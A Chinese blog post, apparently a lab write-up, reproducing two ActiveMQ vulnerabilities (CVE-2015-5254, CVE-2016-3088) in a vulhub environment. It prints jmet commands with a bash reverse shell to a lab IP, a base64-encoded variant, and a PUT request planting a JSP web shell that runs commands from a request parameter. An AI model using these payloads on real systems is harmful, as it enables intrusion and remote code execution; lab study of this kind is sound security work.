vulhub漏洞复现之ActiveMQ(CVE-2015-5254、CVE-2016-3088)

最新推荐文章于 2024-04-10 11:50:57 发布
最新推荐文章于 2024-04-10 11:50:57 发布
阅读量292 收藏
点赞数
文章标签: activemq 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/110134629
版权

记录这次一点都不顺利的漏洞复现,两个漏洞都没能反弹shell,getshell,记录复现过程,或许对各位有一丢丢得作用,过程可能比较粗糙,还请各位见谅

ActiveMQ 反序列化漏洞(CVE-2015-5254)

漏洞简介:
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
影响版本:
Apache ActiveMQ 5.13.0之前的版本。
漏洞利用:
进入靶场,进入/admin 账号密码都为admin
在这里插入图片描述

执行jar包命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 靶机地址 端口

在这里插入图片描述
通过命令给目标的ActiveMQ添加一个事件的队列,通过http://id:8161/admin/browse.jsp?JMSDestination=event 可以看到这个队列中的消息:
点击事件触发
在这里插入图片描述
执行成功
在这里插入图片描述

据说失败是这个样子,但我没遇到,所以放了别人的图
在这里插入图片描述

但是我的success呢?
在这里插入图片描述

应该是利用成功了,但是没看到创建的文件。
重新退出,重新进镜像,可以看到success成功创建。
在这里插入图片描述

试试能不能反弹shell

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -i >& /dev/tcp/192.168.118.1/4444 0>&1” -Yp ROME 192.168.118.147 61616

在这里插入图片描述
点击事件触发
在这里插入图片描述

在这里插入图片描述

没反弹成功,看到人家的博客说不成功的话就换一下base64编码
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExOC4xNDcvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}” -Yp ROME 192.168.118.147 61616
那咱就尝试一下base64编码,
在这里插入图片描述

请求过来了,但是还是没法反弹shell,难受,不知道是为啥。弄了一早上,最终卡在了这里。

ActiveMQ任意文件写入漏洞(CVE-2016-3088)

漏洞详情:
ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。
漏洞危害:
使远程攻击者用恶意代码替代Web应用,在受影响系统上执行远程代码
影响范围:
Apache ActiveMQ 5.x ~ 5.14.0
漏洞复现:
进入靶场,登陆,账号密码为admin admin
在这里插入图片描述

访问http://192.168.118.147:8161/admin/test/systemProperties.jsp,查看Active MQ的路径
在这里插入图片描述

Bp抓包,修改为PUT方法,写入shell,发送

PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.118.147:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

<%
  	if("023".equals(request.getParameter("pwd"))){
  		java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
  		int a = -1;
  		byte[] b = new byte[2048];
  		out.print("<pre>");
  		while((a=in.read(b))!=-1){
  			out.println(new String(b));
  		}
  		out.print("</pre>");
  	}
%>

在这里插入图片描述

看到回显204 成功写入,访问一下
在这里插入图片描述

使用move将文件转移到api目录下,就能解析文件
在这里插入图片描述

到api目录下,可以看到成功转移
在这里插入图片描述

访问1.jsp,带上参数,漏洞利用成功
在这里插入图片描述

尝试上传马getshell
在这里插入图片描述

上传都成功了,但是都连不上,原因是什么呢?试了好久没搞懂,就先放弃了,先试到这儿吧。

两个漏洞都没完全复现,可能vulhub靶场有点问题(甩锅),还是得多学习才行啊。

Lin冲啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Vulnhub复现漏洞 - ActiveMQ任意文件写入漏洞CVE-2016-3088
JiangBuLiu的博客
06-27 1839
可点击目录分类快捷浏览↓Vulnhub官方复现教程漏洞原理背景简述漏洞详情复现漏洞启动环境写入webshell上传webshell设置浏览器代理配置(与Burp拦截设置一致)打开Burp Suite设置拦截端口(主机)(与浏览器设置一致)在Burp Suite的拦截抓包中写入WebShell移动到web目录下的api文件夹中:原教程移动到web目录下的api文件夹(/opt/activemq/we...
ActiveMQ CVE-2015-5254复现
部分学习记录
11-19 165
复现过程 启动环境 docker-compose up -d 查看容器 docker ps 打开浏览器访问本机IP端口192.168.109.128:8161,页面正常,搭建成功 访问http://192.168.109.128:8161/admin/,以admin/admin登录,进入管理界面 漏洞利用: 下载jmet的jar文件 wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.j
vulhub漏洞复现学习之activemq
m0_60720031的博客
03-07 859
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信,WEB管理页面默认端口为8161。
ActiveMQ 反序列化漏洞复现CVE-2015-5254
浮生一世暖流年的博客
12-18 268
环境搭建 使用vulhub搭建环境,docker-compose up -d 环境搭建以后,开始监听8161和61616两个端口,其中8161是web管理端的端口,61616是工作端口。 复现过程 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消息,发送给目标61616端口 访问web管理页面,读取消息,触发漏洞 生成序列化对象 使用jmt生成,在同目录下创建一个external文件夹,不然可能报文件不存在错误。 java -jar jmet-0.1.0-all.jar
vulhubActiveMQ
最新发布
weixin_56306210的博客
04-10 727
vulhubActiveMQ
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5-src.zip
06-10
ActiveMQ-CPP库3.9.5源代码解析与应用》 ActiveMQ-CPP库是Apache ActiveMQ项目的一部分,它提供了一套C++接口,用于与ActiveMQ消息代理进行通信。这个库允许开发者在C++应用程序中实现高级消息队列协议(AMQP)和...
apache-activemq-5.17.3
12-27
这个名为"apache-activemq-5.17.3"的压缩包包含了ActiveMQ的5.17.3版本,这是一个稳定且功能丰富的发布版本。在深入探讨其具体内容之前,我们首先需要了解ActiveMQ的基本概念以及它与Java开发环境的关系。 ActiveMQ...
apache-activemq-5.16.5
12-27
标题"apache-activemq-5.16.5"指的是该软件的一个特定版本,即5.16.5版本,通常每个新版本都会包含错误修复、性能提升以及新功能的添加。 描述中提到"启动要求jdk版本8+", 这意味着在运行Apache ActiveMQ 5.16.5...
vulhub-activemq-CVE-2015-5254
weixin_43585088的博客
04-17 514
vulhub-activemq-CVE-2015-5254 ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件 默认端口:8161 vulhub起容器 搭建的时候出了点问题,查了一下可能是net模式的dns有问题,sudo vim /etc/resolv.conf 去添加一些nameserver ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.i
ActiveMQ(CVE-2016-3088)复现学习笔记
hklearner的博客
03-28 608
ActiveMQ复现学习笔记 (CVE-2016-3088) 漏洞描述 影响版本:Apache ActiveMQ 5.x~5.14.0 漏洞产生原因:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持
Apache ActiveMQ序列化漏洞复现(CVE-2015-5254)
DaWan
09-19 192
这里写自定义目录标题1.环境搭建1.1 下载vulhub1.1 启动环境2.漏洞复现2.1 下载EXP2.2 执行命令 1.环境搭建 1.1 下载vulhub wget https://github.com/vulhub/vulhub 1.1 启动环境 cd /vulhub/activemq/CVE-2015-5254 docker-compose up -d 查看本机IP地址: 截止到此处,环境搭建完成。 2.漏洞复现 2.1 下载EXP 下载地址:https://gi
vulhub漏洞——ActiveMQ
weixin_45808483的博客
12-07 758
访问 3128 端口 Goby扫描资产
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
huangyongkang666的博客
10-31 6205
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3595
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。
02 - vulhub - ActiveMQ任意文件写入漏洞 - CVE-2016-3088 复现
易编橙 · 终身成长社群,相遇已是上上签!
09-22 772
漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞
vulhub复现activemq
shayebudon的博客
06-22 436
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。环境运行后,会开启两个端口,61616和8161 其中61616是工作端口,消息在这个端口进行传递,8161是网络管理页面端口,访问ip:8161即可看到网络管理页面。漏洞详情: Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序
Vluhub漏洞ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
FryhRx的博客
04-05 4781
Vluhub漏洞ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
CVE-2016-3088复现
07-28
CVE-2016-3088是一个存在于fileserver应用中的漏洞,其原理是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值